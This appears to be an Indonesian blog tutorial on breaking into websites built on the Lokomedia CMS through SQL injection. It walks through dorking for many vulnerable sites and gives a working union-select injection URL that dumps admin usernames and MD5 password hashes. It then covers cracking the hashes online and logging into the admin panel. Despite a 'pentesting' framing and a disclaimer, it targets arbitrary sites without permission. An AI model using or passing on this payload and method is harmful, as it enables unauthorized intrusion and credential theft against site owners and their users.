Tutorial Penetrasi Web dengan SQLI CMS Lokomedia

pentesting lokomedia, penetrasi lokomedia, cara melakukan penetrasi pada cms lokomedia


Tutorial Penetrasi Web dengan SQLI CMS Lokomedia

Tutorial Penetrasi Web dengan SQLI CMS Lokomedia - adalah salah satu teknik pentesting web yang menggunakan sql injection, dengan memanfaatkan celah keamanan ( vuln ) pada website yang menggunakan cms lokomedia, kita dapat menggunakan teknik ini untuk meng-exploit website tersebut, tentu saja tujuannya adalah melakukan penetrasi pada website agar sang admin mengetahui celah keamanan pada websitenya, agar lebih menyempurnakan lagi tingkat keamanannya.

Bahan yang di Butuhkan

  • Komputer/Laptop/Android
  • Koneksi Internet
  • Dork :

  • Exploit 1 :

  • Exploit 2 :

  • Haskiler :
- https://hashkiller.co.uk/md5-decrypter.aspx
- http://md5online.org/
- Md5 Haskiler
  • 2 Cangkir Kopi ( Bebas Sesuai Selera )
  • 3 Bungkus Roti


Step by Step :

  • Hidupkan Komputer/Laptop/Android anda
  • Hubungkan ke internet
  • Dorking menggunakan salah satu dork di atas
  • Pilih site, kumpulkan sebanyak mungkin
  • Masukan exploit, ( contoh : http://marikita.co.li/statis-2-profil.html menjadi http://marikita.co.li/statis-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)[email protected]:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html )
  • View Source dengan cara tekan "Ctrl + U"
  • Salin username dan password yang terdapat pada tag Title

usernam dan password pada tag title - sqli lokomedia

  • Pada gambar di atas terlihat bahwa username adalah "smarihast4" kemudian di sampingnya adalah password, namun password masih dalam bentuk md5 anda harus mendecrypt password tersebut menggunakan jasa web hash geratis di atas
  • Jika sudah berhasil kemudian cari halaman login admin, biasanya terletak di :

  • Anda juga bisa menggunakan tool admin panel versi network security, jika berhasil login, selanjutnya terserah anda saja
    Note! : Alangkah baiknya mencari halaman login terlebih dahulu

    Itulah tutorial penetrasi web dengan sqli cms lokomedia, tidak semua berhasil menggunakan teknik ini, mereka yang berhasil adalah mereka yang selalu berusaha, dan perlu anda ketahui, tujuan dari semua ini hanyalah untuk pelajaran semata, jika anda menyalahgunakannya segala dosa dan resiko tanggung sendiri, jangan lupa share dan tinggalkan jejak anda di komentar... Selamat mencoba...

    COMMENTS

    BLOGGER: 6
    Loading...
    Name

    Android,4,BlackBerry,3,Blogging,2,Coding,2,Desain,1,Hardware,3,HTML,1,Info,2,Internet,4,Intranet,6,iOS,3,Jaringan,6,Kategori,18,Komputer,10,Pentesting,5,Python,1,Seluler,4,SEO,1,Software,10,Tools,3,Tutorial,12,WEB,5,
    ltr
    item
    Al Maz Bos: Tutorial Penetrasi Web dengan SQLI CMS Lokomedia
    Tutorial Penetrasi Web dengan SQLI CMS Lokomedia
    pentesting lokomedia, penetrasi lokomedia, cara melakukan penetrasi pada cms lokomedia
    https://2.bp.blogspot.com/-QthRXsN6Iaw/WVsQ0nioz_I/AAAAAAAAAIQ/T-BLHvfo08ARU-Gnmbr9ComruSrR5hOHgCEwYBhgL/s400/lokomedia-sqli-almazbos.png
    https://2.bp.blogspot.com/-QthRXsN6Iaw/WVsQ0nioz_I/AAAAAAAAAIQ/T-BLHvfo08ARU-Gnmbr9ComruSrR5hOHgCEwYBhgL/s72-c/lokomedia-sqli-almazbos.png
    Al Maz Bos
    http://www.almazbos.net/2017/07/penetrasi-web-dengan-sqli-lokomedia.html
    http://www.almazbos.net/
    http://www.almazbos.net/
    http://www.almazbos.net/2017/07/penetrasi-web-dengan-sqli-lokomedia.html
    true
    1069009630902974582
    UTF-8
    Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy